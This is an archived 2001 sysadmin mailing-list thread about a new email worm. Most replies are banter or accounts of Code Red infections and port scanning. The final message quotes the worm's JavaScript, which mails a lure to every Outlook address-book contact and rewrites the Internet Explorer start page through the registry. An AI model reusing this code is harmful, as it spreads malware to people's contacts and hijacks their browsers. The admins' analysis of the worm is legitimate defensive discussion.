Re: New Worm on the loose
I live in a state called "Victoria" in Australia does that count :-) - Original Message - From: "Lefkovics, William" <[EMAIL PROTECTED]> To: "NT System Admin Issues" <[EMAIL PROTECTED]> Sent: Thursday, August 30, 2001 6:33 AM Subject: RE: New Worm on the loose > I knew a girl named Victoria. > > -Original Message- > From: Les Bessant [mailto:[EMAIL PROTECTED]] > Sent: Wednesday, August 29, 2001 3:04 AM > To: NT System Admin Issues > Subject: RE: New Worm on the loose > > > You want try Victoria on a really hot day. > > Arrrgggh. > > Les Bessant mailto:[EMAIL PROTECTED] > IT Manager, Sanderson Townend & Gilbert > Acting in a personal capacity > http://www.tiggercam.co.uk - New, improved and with more bounce! > > >-Original Message- > >From: Don Ely [mailto:[EMAIL PROTECTED]] > >Sent: Tuesday, August 28, 2001 6:49 PM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > > > >LOL! It wasn't "that" bad. Albeit, the wait for some of the > >trains was > >excruciating sometimes. :o) > > > >-Original Message- > >From: Clayton Doige [mailto:[EMAIL PROTECTED]] > >Sent: Tuesday, August 28, 2001 10:39 AM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > > > >Poor sod > > > >Clayton Doige > >IT Manager MCSE, MCP + I > >Gameday International N.V. > >Bound in a nutshell, King of infinite space... > > > >T: +5 999 736 0309 > >C: +5 999 563 1845 > >F: +5 999 733 1259 > >E: [EMAIL PROTECTED] > > > > > >-Original Message- > >From: Don Ely [mailto:[EMAIL PROTECTED]] > >Sent: Tuesday, August 28, 2001 12:34 PM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > >I have! A few times... > > > >-Original Message- > >From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] > >Sent: Monday, August 27, 2001 6:45 PM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > > > >Someone has been to London and rode the tubes!! > > > >Mark > > > >-Original Message- > >From: Lefkovics, William [mailto:[EMAIL PROTECTED]] > >Sent: Monday, August 27, 2001 6:50 PM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > > > >Mind the Gap! > > > >-Original Message- > >From: Martin Blackstone [mailto:[EMAIL PROTECTED]] > >Sent: Monday, August 27, 2001 3:51 PM > >To: NT System Admin Issues > >Subject: RE: New Worm on the loose > > > > > >Hi ! (notice the space) ("notice the space" is not part of the subject) > > > >-Original Message- > >From: Jay Woody [mailto:[EMAIL PROTECTED]] > >Sent: Monday, August 27, 2001 2:48 PM > >To: NT System Admin Issues > >Subject: Re: New Worm on the loose > > > > > >Is there a subject line? > > > >JayW > > > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Nmap on Linux. "Blake R. Fowkes" To: "NT System Admin Issues" .com>cc: Subject: RE: New Worm on the loose 08/29/2001 02:53 PM Please respond to "NT System Admin Issues" What are you using now for your port scans? Thanks, Blake Fowkes Waid and Associates -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 4:48 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone may have carried a code red infected laptop into your office and plugged into your lan.That's what happened to us and we found a total of 6 machines infected shortly after that.We have Norton Corp Edition on all machines so I saw it as it happened.We thought we were safe because we didnt have any IIS servers with public IP addresses.Then we found out that we had some IIS that we didnt know about.Some thorough port scans also revealed a machine with an unauthorized remote control program, as well as some other machines that also had IIS but didnt get infected because we got the infected machines unplugged pretty quick.So now I'm going to do regular port scans to look for such problems.I'm trying to get the bucks to buy Sniffer Pro licenses so I can leave the sniffer running all the time and have it send an snmp trap to the monitoring console if it sees any of these alerted ports where they shouldnt be. I also have a project underway to automatically update all the Win2k machines when a hotfix is released. When we were running all Win95 and 98, we didnt really pay much attention to patching.Now it's mandatory. To: "NT System Admin Issues" Sent by: "Gavin <[EMAIL PROTECTED]> Landon" cc: 08/29/2001 02:11 PM Please respond to "NT System Admin Issues" Talking about worms, you guys want to hear something real funny. We have a SQL server that we didn't know a previous employee had put IIS5 on it. So we got hit by the code red virus. (there are no domains so we are unknowing how the hell codered found it!) Anyway one day I logged into SQL and up popped a dialog that say this: = Message from "Apache User" to MachineName on 8/15/2001 1:55:45 PM *** Virus Alert *** => Your computer is infected with the Code Red worm! <= (You are getting this message because your machine has tried to infect mine) For Instructions of how to remove the worm follow this URL: http://www.microsoft.com/technet/itsolutions/security/topics/codeptch.asp Perhaps you want to install the Apache web server instead of IIS? http://www.apache.org = Yea, Unix had to put in their two cents!!! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Title: RE: New Worm on the loose What are you using now for your port scans? Thanks, Blake Fowkes Waid and Associates -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 4:48 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone may have carried a code red infected laptop into your office and plugged into your lan. That's what happened to us and we found a total of 6 machines infected shortly after that. We have Norton Corp Edition on all machines so I saw it as it happened. We thought we were safe because we didnt have any IIS servers with public IP addresses. Then we found out that we had some IIS that we didnt know about. Some thorough port scans also revealed a machine with an unauthorized remote control program, as well as some other machines that also had IIS but didnt get infected because we got the infected machines unplugged pretty quick. So now I'm going to do regular port scans to look for such problems. I'm trying to get the bucks to buy Sniffer Pro licenses so I can leave the sniffer running all the time and have it send an snmp trap to the monitoring console if it sees any of these alerted ports where they shouldnt be. I also have a project underway to automatically update all the Win2k machines when a hotfix is released. When we were running all Win95 and 98, we didnt really pay much attention to patching. Now it's mandatory. twork.com> To: "NT System Admin Issues" Sent by: "Gavin <[EMAIL PROTECTED]> Landon" cc: rk.com> 08/29/2001 02:11 PM Please respond to "NT System Admin Issues" Talking about worms, you guys want to hear something real funny. We have a SQL server that we didn't know a previous employee had put IIS5 on it. So we got hit by the code red virus. (there are no domains so we are unknowing how the hell codered found it!) Anyway one day I logged into SQL and up popped a dialog that say this: = Message from "Apache User" to MachineName on 8/15/2001 1:55:45 PM *** Virus Alert *** => Your computer is infected with the Code Red worm! <= (You are getting this message because your machine has tried to infect mine) For Instructions of how to remove the worm follow this URL: http://www.microsoft.com/technet/itsolutions/security/topics/codeptch.asp Perhaps you want to install the Apache web server instead of IIS? http://www.apache.org = Yea, Unix had to put in their two cents!!! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Someone may have carried a code red infected laptop into your office and plugged into your lan.That's what happened to us and we found a total of 6 machines infected shortly after that.We have Norton Corp Edition on all machines so I saw it as it happened.We thought we were safe because we didnt have any IIS servers with public IP addresses.Then we found out that we had some IIS that we didnt know about.Some thorough port scans also revealed a machine with an unauthorized remote control program, as well as some other machines that also had IIS but didnt get infected because we got the infected machines unplugged pretty quick.So now I'm going to do regular port scans to look for such problems.I'm trying to get the bucks to buy Sniffer Pro licenses so I can leave the sniffer running all the time and have it send an snmp trap to the monitoring console if it sees any of these alerted ports where they shouldnt be. I also have a project underway to automatically update all the Win2k machines when a hotfix is released. When we were running all Win95 and 98, we didnt really pay much attention to patching.Now it's mandatory. To: "NT System Admin Issues" Sent by: "Gavin <[EMAIL PROTECTED]> Landon" cc: 08/29/2001 02:11 PM Please respond to "NT System Admin Issues" Talking about worms, you guys want to hear something real funny. We have a SQL server that we didn't know a previous employee had put IIS5 on it. So we got hit by the code red virus. (there are no domains so we are unknowing how the hell codered found it!) Anyway one day I logged into SQL and up popped a dialog that say this: = Message from "Apache User" to MachineName on 8/15/2001 1:55:45 PM *** Virus Alert *** => Your computer is infected with the Code Red worm! <= (You are getting this message because your machine has tried to infect mine) For Instructions of how to remove the worm follow this URL: http://www.microsoft.com/technet/itsolutions/security/topics/codeptch.asp Perhaps you want to install the Apache web server instead of IIS? http://www.apache.org = Yea, Unix had to put in their two cents!!! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Talking about worms, you guys want to hear something real funny. We have a SQL server that we didn't know a previous employee had put IIS5 on it. So we got hit by the code red virus. (there are no domains so we are unknowing how the hell codered found it!) Anyway one day I logged into SQL and up popped a dialog that say this: = Message from "Apache User" to MachineName on 8/15/2001 1:55:45 PM *** Virus Alert *** => Your computer is infected with the Code Red worm! <= (You are getting this message because your machine has tried to infect mine) For Instructions of how to remove the worm follow this URL: http://www.microsoft.com/technet/itsolutions/security/topics/codeptch.asp Perhaps you want to install the Apache web server instead of IIS? http://www.apache.org = Yea, Unix had to put in their two cents!!! http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
I knew a girl named Victoria. -Original Message- From: Les Bessant [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 3:04 AM To: NT System Admin Issues Subject: RE: New Worm on the loose You want try Victoria on a really hot day. Arrrgggh. Les Bessant mailto:[EMAIL PROTECTED] IT Manager, Sanderson Townend & Gilbert Acting in a personal capacity http://www.tiggercam.co.uk - New, improved and with more bounce! >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 6:49 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >LOL! It wasn't "that" bad. Albeit, the wait for some of the >trains was >excruciating sometimes. :o) > >-Original Message- >From: Clayton Doige [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 10:39 AM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Poor sod > >Clayton Doige >IT Manager MCSE, MCP + I >Gameday International N.V. >Bound in a nutshell, King of infinite space... > >T: +5 999 736 0309 >C: +5 999 563 1845 >F: +5 999 733 1259 >E: [EMAIL PROTECTED] > > >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 12:34 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > >I have! A few times... > >-Original Message----- >From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:45 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Someone has been to London and rode the tubes!! > >Mark > >-----Original Message- >From: Lefkovics, William [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:50 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Mind the Gap! > >-Original Message- >From: Martin Blackstone [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 3:51 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Hi ! (notice the space) ("notice the space" is not part of the subject) > >-Original Message- >From: Jay Woody [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 2:48 PM >To: NT System Admin Issues >Subject: Re: New Worm on the loose > > >Is there a subject line? > >JayW > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
I reckon the Picadilly line gives it a good run for it's money! Glad to be on the other side of the Atlantic now! Ian mailto:[EMAIL PROTECTED] Adding manpower to a late software project makes it later. - Brook -Original Message- From: Les Bessant [mailto:[EMAIL PROTECTED]] Sent: 29 August 2001 06:04 To: NT System Admin Issues Subject: RE: New Worm on the loose You want try Victoria on a really hot day. Arrrgggh. Les Bessant mailto:[EMAIL PROTECTED] IT Manager, Sanderson Townend & Gilbert Acting in a personal capacity http://www.tiggercam.co.uk - New, improved and with more bounce! >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 6:49 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >LOL! It wasn't "that" bad. Albeit, the wait for some of the >trains was >excruciating sometimes. :o) > >-Original Message- >From: Clayton Doige [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 10:39 AM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Poor sod > >Clayton Doige >IT Manager MCSE, MCP + I >Gameday International N.V. >Bound in a nutshell, King of infinite space... > >T: +5 999 736 0309 >C: +5 999 563 1845 >F: +5 999 733 1259 >E: [EMAIL PROTECTED] > > >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 12:34 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > >I have! A few times... > >-Original Message----- >From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:45 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Someone has been to London and rode the tubes!! > >Mark > >-Original Message- >From: Lefkovics, William [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:50 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Mind the Gap! > >-Original Message- >From: Martin Blackstone [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 3:51 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Hi ! (notice the space) ("notice the space" is not part of the subject) > >-Original Message- >From: Jay Woody [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 2:48 PM >To: NT System Admin Issues >Subject: Re: New Worm on the loose > > >Is there a subject line? > >JayW > >>>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> >Sorry about the cross posting. > >We don't have a lot of specifics on it, but there appears to be a new >worm on the loose. The payload is a typical Melissa-style worm, where >its only action is to send mail to all members of the GAL, with the >following >message: >"Hi, how are you ? I am fine here. Please read the page >http://pcControl.tripod.com/ to get some knowledge and prevent somebody >hack you. Forword this mail to help all your friends too." > >Its plain text, and carries no executables with it, but I haven't >visited the website yet. More info to follow, but there is zero >information on the web about it at this point. > >Roger >-- >Roger D. Seielstad - MCSE MCT >Senior Systems Administrator >Peregrine Systems >Atlanta, GA >http://www.peregrine.com > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > >_ >This message has been checked for all known viruses by Star Internet >delivered through the MessageLabs Virus Scanning Service. For further >information visit http://www.star.net.uk/stats.asp or alternatively >call Star Internet for details on the Virus Scanning Service. > The information in this communication and any attachments is confidential and may be legally privileged. It is intended solely for the addressee. If you are not the intended recipient any use, review, dissemination, distribution or copying of this information is strictly prohibited. If you have received this communication in error please notify us immediately on 0191 261 2681 and delete the original message and any copies of it. Any opinions, conclusions or other information in this message t
RE: New Worm on the loose
You want try Victoria on a really hot day. Arrrgggh. Les Bessant mailto:[EMAIL PROTECTED] IT Manager, Sanderson Townend & Gilbert Acting in a personal capacity http://www.tiggercam.co.uk - New, improved and with more bounce! >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 6:49 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >LOL! It wasn't "that" bad. Albeit, the wait for some of the >trains was >excruciating sometimes. :o) > >-Original Message- >From: Clayton Doige [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 10:39 AM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Poor sod > >Clayton Doige >IT Manager MCSE, MCP + I >Gameday International N.V. >Bound in a nutshell, King of infinite space... > >T: +5 999 736 0309 >C: +5 999 563 1845 >F: +5 999 733 1259 >E: [EMAIL PROTECTED] > > >-Original Message- >From: Don Ely [mailto:[EMAIL PROTECTED]] >Sent: Tuesday, August 28, 2001 12:34 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > >I have! A few times... > >-Original Message----- >From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:45 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Someone has been to London and rode the tubes!! > >Mark > >-----Original Message- >From: Lefkovics, William [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 6:50 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Mind the Gap! > >-Original Message- >From: Martin Blackstone [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 3:51 PM >To: NT System Admin Issues >Subject: RE: New Worm on the loose > > >Hi ! (notice the space) ("notice the space" is not part of the subject) > >-Original Message- >From: Jay Woody [mailto:[EMAIL PROTECTED]] >Sent: Monday, August 27, 2001 2:48 PM >To: NT System Admin Issues >Subject: Re: New Worm on the loose > > >Is there a subject line? > >JayW > >>>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> >Sorry about the cross posting. > >We don't have a lot of specifics on it, but there appears to be a new >worm on the loose. The payload is a typical Melissa-style worm, where >its only action is to send mail to all members of the GAL, with the >following >message: >"Hi, how are you ? I am fine here. Please read the page >http://pcControl.tripod.com/ to get some knowledge and prevent somebody >hack you. Forword this mail to help all your friends too." > >Its plain text, and carries no executables with it, but I haven't >visited the website yet. More info to follow, but there is zero >information on the web about it at this point. > >Roger >-- >Roger D. Seielstad - MCSE MCT >Senior Systems Administrator >Peregrine Systems >Atlanta, GA >http://www.peregrine.com > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > > >http://www.sunbelt-software.com/ntsysadmin_list_charter.htm > > >_ >This message has been checked for all known viruses by Star Internet >delivered through the MessageLabs Virus Scanning Service. For further >information visit http://www.star.net.uk/stats.asp or >alternatively call >Star Internet for details on the Virus Scanning Service. > The information in this communication and any attachments is confidential and may be legally privileged. It is intended solely for the addressee. If you are not the intended recipient any use, review, dissemination, distribution or copying of this information is strictly prohibited. If you have received this communication in error please notify us immediately on 0191 261 2681 and delete the original message and any copies of it. Any opinions, conclusions or other information in this message that do not relate to the official business of Sanderson Townend & Gilbert are neither given nor endorsed by the firm. _ This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Tube worm? -Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 10:34 AM To: NT System Admin Issues Subject: RE: New Worm on the loose I have! A few times... -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:45 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone has been to London and rode the tubes!! Mark -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:50 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
LOL! It wasn't "that" bad. Albeit, the wait for some of the trains was excruciating sometimes. :o) -Original Message- From: Clayton Doige [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 10:39 AM To: NT System Admin Issues Subject: RE: New Worm on the loose Poor sod Clayton Doige IT Manager MCSE, MCP + I Gameday International N.V. Bound in a nutshell, King of infinite space... T: +5 999 736 0309 C: +5 999 563 1845 F: +5 999 733 1259 E: [EMAIL PROTECTED] -Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 12:34 PM To: NT System Admin Issues Subject: RE: New Worm on the loose I have! A few times... -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:45 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone has been to London and rode the tubes!! Mark -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:50 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Poor sod Clayton Doige IT Manager MCSE, MCP + I Gameday International N.V. Bound in a nutshell, King of infinite space... T: +5 999 736 0309 C: +5 999 563 1845 F: +5 999 733 1259 E: [EMAIL PROTECTED] -Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 12:34 PM To: NT System Admin Issues Subject: RE: New Worm on the loose I have! A few times... -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:45 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone has been to London and rode the tubes!! Mark -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:50 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
I have! A few times... -Original Message- From: Mark L. Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:45 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Someone has been to London and rode the tubes!! Mark -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:50 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Someone has been to London and rode the tubes!! Mark -Original Message- From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 6:50 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Mind the Gap! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:51 PM To: NT System Admin Issues Subject: RE: New Worm on the loose Hi ! (notice the space) ("notice the space" is not part of the subject) -Original Message- From: Jay Woody [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:48 PM To: NT System Admin Issues Subject: Re: New Worm on the loose Is there a subject line? JayW >>> [EMAIL PROTECTED] 08/27/01 03:46PM >>> Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
Page is now down. Anymore info on what was there? Mark -Original Message- From: Roger Seielstad [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 4:46 PM To: NT System Admin Issues Subject: New Worm on the loose Importance: High Sorry about the cross posting. We don't have a lot of specifics on it, but there appears to be a new worm on the loose. The payload is a typical Melissa-style worm, where its only action is to send mail to all members of the GAL, with the following message: "Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too." Its plain text, and carries no executables with it, but I haven't visited the website yet. More info to follow, but there is zero information on the web about it at this point. Roger -- Roger D. Seielstad - MCSE MCT Senior Systems Administrator Peregrine Systems Atlanta, GA http://www.peregrine.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: New Worm on the loose
I would assume the following JS may be a good place to start: if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page") == "http://pccontrol.tripod.com/";) {return(0);} ta=ol.GetNameSpace("MAPI").AddressLists.count; for(a=1;a<=ta;++a){ tb=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries.count; for(b=1;b<=tb;++b){ try{ Mail=ol.CreateItem(0); Mail.to=ol.GetNameSpace("MAPI").AddressLists(a).AddressEntries(b); Mail.Subject="Hi !"; Mail.Body="Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too."; Mail.Send; } catch(e){} } } } function WriteRegMain() { if(WShl.RegRead("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page") != "http://pccontrol.tripod.com/";) {WShl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://pccontrol.tripod.com/";);} Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell & Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] <mailto:[EMAIL PROTECTED]> -Original Message----- From: Dean Cunningham [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:59 PM To: NT System Admin Issues Subject: RE: New Worm on the loose William may well of triggered some of your AV products off with a reply to this message. It contained the javascript associated with the page. **Even tho it was benign 